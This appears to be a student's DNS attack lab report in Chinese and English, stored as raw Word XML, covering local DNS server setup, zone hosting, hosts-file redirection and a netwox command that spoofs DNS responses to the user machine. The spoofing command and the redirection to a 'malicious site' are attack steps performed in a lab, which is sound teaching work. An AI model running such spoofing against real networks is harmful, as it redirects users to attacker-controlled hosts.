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672DD" w14:textId="77777777" w:rsidR="00F80E6E" w:rsidRPr="00B92842" w:rsidRDefault="00A2456E" w:rsidP="00CB5442">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Local DNS Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421875C" w14:textId="40D7656B" w:rsidR="00A2456E" w:rsidRDefault="00A2456E" w:rsidP="00B92842">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>7117132</w:t>
      </w:r>
      <w:r w:rsidR="00B92842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>马鸣宇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D245F" w14:textId="77777777" w:rsidR="00B92842" w:rsidRDefault="00B9284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本实验需要三台虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB547EE" w14:textId="7FD24E1F" w:rsidR="00B92842" w:rsidRDefault="00B92842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UserMachine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IP):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.1.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34740DC8" w14:textId="78405AB3" w:rsidR="00B92842" w:rsidRDefault="00B92842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ocalDNSServer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IP):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074645C7" w14:textId="206642AB" w:rsidR="00B92842" w:rsidRDefault="00B9284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ttacker(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>IP):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.1.108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8570B" w14:textId="77777777" w:rsidR="00B92842" w:rsidRDefault="00B92842"/>
    <w:p w14:paraId="175C6174" w14:textId="77777777" w:rsidR="00CB5442" w:rsidRPr="00B92842" w:rsidRDefault="00CB5442" w:rsidP="00CB5442">
      <w:pPr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B92842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task 1: Configure the User Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F61651" w14:textId="0CD9DC9E" w:rsidR="00FF5E06" w:rsidRDefault="00B92842">
      <w:r w:rsidRPr="00B92842">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="485E6809" wp14:editId="27630A85">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>363855</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5173980" cy="607695"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20991"/>
                <wp:lineTo x="21552" y="20991"/>
                <wp:lineTo x="21552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"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="517398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92842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在客户机上配置本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92842">
        <w:t>DNS服务器的IP地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C30B14" w14:textId="77777777" w:rsidR="00FF5E06" w:rsidRDefault="00A2519F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用命令d</w:t>
      </w:r>
      <w:r>
        <w:t>ig localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现DNS服务器已经变成所设定的虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CB616" w14:textId="34FFBC92" w:rsidR="00A2519F" w:rsidRDefault="00A2519F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58FF6FD7" wp14:editId="5A726205">
            <wp:extent cx="5270500" cy="10814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0-09-16 下午18.28.11 下午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01B5" w14:textId="4C386055" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="29D48614" w14:textId="77777777" w:rsidR="007020EE" w:rsidRDefault="007020EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58325031" w14:textId="77777777" w:rsidR="00A2519F" w:rsidRPr="00B92842" w:rsidRDefault="00A2519F">
      <w:pPr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B92842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task 2: Set up a Local DNS Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD5013" w14:textId="487C14B3" w:rsidR="00A2519F" w:rsidRDefault="00B92842">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>服务器保护机制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511DE3F1" w14:textId="5B32E660" w:rsidR="00B92842" w:rsidRDefault="00B92842">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A3366E0" wp14:editId="4E9E7E48">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>60960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="411480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500" y="21339"/>
                <wp:lineTo x="2150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/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="411480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FCF6C0" w14:textId="77777777" w:rsidR="00B92842" w:rsidRDefault="00B92842"/>
    <w:p w14:paraId="78562D27" w14:textId="77777777" w:rsidR="00B92842" w:rsidRDefault="00B92842"/>
    <w:p w14:paraId="693C6E66" w14:textId="77777777" w:rsidR="00B92842" w:rsidRDefault="00B92842"/>
    <w:p w14:paraId="58E5A837" w14:textId="4E641B84" w:rsidR="00A2519F" w:rsidRDefault="00A2519F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B7CB4" w14:textId="5D55C206" w:rsidR="00B92842" w:rsidRDefault="00B92842">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0142DC" wp14:editId="516ED43A">
            <wp:extent cx="4198984" cy="75444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3279" w14:textId="118E4E26" w:rsidR="00A2519F" w:rsidRDefault="00D2093F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用用户机ping</w:t>
      </w:r>
      <w:r w:rsidR="00B92842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意网站，这里ping</w:t>
      </w:r>
      <w:r w:rsidR="00B92842">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B92842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>百度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抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47644CC2" w14:textId="77777777" w:rsidR="00D2093F" w:rsidRDefault="00D2093F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041C0C93" wp14:editId="431B069E">
            <wp:extent cx="5270500" cy="4159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20-09-16 下午18.39.53 下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4313" w14:textId="6C9346FC" w:rsidR="00B92842" w:rsidRDefault="00B9284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在客户端任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>地址，在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>上没有观察到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>缓存用于访问一个不知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>地址的网站。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6917114E" w14:textId="77777777" w:rsidR="007020EE" w:rsidRDefault="007020EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024369C9" w14:textId="77777777" w:rsidR="00B92842" w:rsidRDefault="00B92842">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019BCD11" w14:textId="23F7F57B" w:rsidR="00D2093F" w:rsidRPr="00B92842" w:rsidRDefault="00D2093F">
      <w:pPr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B92842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task 3: Host a Zone in the Local DNS Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262387CC" w14:textId="77777777" w:rsidR="00B92842" w:rsidRDefault="00B9284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创建域：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD3C611" w14:textId="561CB39E" w:rsidR="005825F3" w:rsidRPr="00B92842" w:rsidRDefault="00B92842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4BB0753E" wp14:editId="4B8EBA1E">
            <wp:extent cx="4214225" cy="17527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792A" w14:textId="2B322F64" w:rsidR="005825F3" w:rsidRDefault="00B92842">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>设置正向查找域文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F50D516" w14:textId="14831F90" w:rsidR="00B203C5" w:rsidRDefault="00B203C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="055E8D44" wp14:editId="175E14CA">
            <wp:extent cx="4244708" cy="156223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4601" w14:textId="40A05113" w:rsidR="00F87120" w:rsidRPr="00B203C5" w:rsidRDefault="00B92842">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>设置反向查找域文件：</w:t>
      </w:r>
      <w:r w:rsidR="00B203C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61531CBE" wp14:editId="61337B9F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41910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502" y="21343"/>
                <wp:lineTo x="21502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42302" w14:textId="77777777" w:rsidR="00B203C5" w:rsidRDefault="00B203C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A6C186" w14:textId="77777777" w:rsidR="00B203C5" w:rsidRDefault="00B203C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3806C84D" w14:textId="77777777" w:rsidR="00B203C5" w:rsidRDefault="00B203C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471CCE99" w14:textId="77777777" w:rsidR="00B203C5" w:rsidRDefault="00B203C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BE79DF" w14:textId="77777777" w:rsidR="00B203C5" w:rsidRDefault="00B203C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0D87DA" w14:textId="77777777" w:rsidR="00B203C5" w:rsidRDefault="00B203C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3537685C" w14:textId="0D562D1E" w:rsidR="00F87120" w:rsidRDefault="00F87120">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启服务器并正向解析，反向解析测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB5CA7" w14:textId="77777777" w:rsidR="00F87120" w:rsidRDefault="00F87120">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D264EE0" wp14:editId="01ACB441">
            <wp:extent cx="5270500" cy="2466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20-09-16 下午19.04.53 下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343B" w14:textId="35D0279B" w:rsidR="00F87120" w:rsidRDefault="00F87120">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598BE306" wp14:editId="66914CF9">
            <wp:extent cx="5270500" cy="26968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20-09-16 下午19.05.43 下午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2C45" w14:textId="558B0711" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="519AF343" w14:textId="4073343F" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="1EA825BD" w14:textId="33BC76C3" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="1D1EA5E1" w14:textId="77777777" w:rsidR="007020EE" w:rsidRDefault="007020EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F692CC" w14:textId="77777777" w:rsidR="00F87120" w:rsidRPr="00B92842" w:rsidRDefault="0028116A">
      <w:pPr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B92842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Task 4: Modifying the Host File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A945F" w14:textId="77777777" w:rsidR="0028116A" w:rsidRDefault="0028116A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改用户机的/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，将example.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>et重定向到恶意站点1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CAC884" w14:textId="596BFD48" w:rsidR="0028116A" w:rsidRDefault="0028116A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F42DD99" wp14:editId="733C1B0F">
            <wp:extent cx="5270500" cy="3994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20-09-16 下午19.19.45 下午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8834" w14:textId="26D5EC96" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="77E20B15" w14:textId="77D363E6" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="03AC719C" w14:textId="098F1550" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="513154E9" w14:textId="77777777" w:rsidR="007020EE" w:rsidRDefault="007020EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187B5F26" w14:textId="77777777" w:rsidR="00CB1131" w:rsidRPr="00B92842" w:rsidRDefault="00CB1131">
      <w:pPr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B92842">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 5: Directly Spoofing Response to User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF53F19" w14:textId="01461E57" w:rsidR="00CB1131" w:rsidRDefault="00B92842">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>运行攻击程序之前：</w:t>
      </w:r>
      <w:r w:rsidR="0063177C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E6FE9D" wp14:editId="2FC2CA17">
            <wp:extent cx="5270500" cy="14814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20-09-16 下午19.37.49 下午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8E5B" w14:textId="77777777" w:rsidR="00CB1131" w:rsidRDefault="0063177C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>清除DNS缓存后</w:t>
      </w:r>
      <w:r w:rsidR="00CB1131">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB1131">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB1131">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪造应答</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BFE98" w14:textId="77777777" w:rsidR="00CB1131" w:rsidRDefault="0063177C">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0063177C">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0063177C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0063177C">
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0063177C">
        <w:t xml:space="preserve"> 105 -h "www.example.net" -H "1.2.3.4" -a "ns.atta</w:t>
      </w:r>
      <w:r w:rsidR="001A488C">
        <w:t>ck</w:t>
      </w:r>
      <w:r w:rsidRPr="0063177C">
        <w:t>.com" -A "1.2.3.4" -f "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0063177C">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0063177C">
        <w:t xml:space="preserve"> host 192.168.1.106"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-T 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E82D646" w14:textId="77777777" w:rsidR="0063177C" w:rsidRDefault="0063177C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击后d</w:t>
      </w:r>
      <w:r>
        <w:t>ig example.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C631917" w14:textId="77777777" w:rsidR="0063177C" w:rsidRDefault="001A488C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ECFB443" wp14:editId="61435B5C">
            <wp:extent cx="5270500" cy="523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20-09-16 下午21.21.32 下午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6324" w14:textId="5541D835" w:rsidR="0063177C" w:rsidRDefault="0063177C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域名指向的IP地址发生了改变，攻击成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A103DFF" w14:textId="3C274A2F" w:rsidR="007020EE" w:rsidRDefault="007020EE"/>
    <w:p w14:paraId="4A55D227" w14:textId="77777777" w:rsidR="007020EE" w:rsidRDefault="007020EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
